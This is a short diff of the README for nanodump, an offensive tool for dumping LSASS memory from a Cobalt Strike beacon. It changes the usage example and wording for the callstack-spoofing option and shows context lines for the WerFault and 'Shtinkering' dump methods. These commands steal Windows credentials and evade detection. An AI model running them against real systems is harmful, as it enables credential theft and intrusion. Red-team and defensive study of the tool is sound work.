fortra/nanodump/README.md

 beacon> nanodump --werfault C:\Windows\Temp\
 ```

-Open a handle to LSASS with an invalid callstack and download the minidump with an invalid signature:
+Open a handle to LSASS with an spoofed callstack and download the minidump with an invalid signature:
 ```
-beacon> nanodump --spoof-callstack svchost
+beacon> nanodump --spoof-callstack
 ```

 Use the Shtinkering techinque: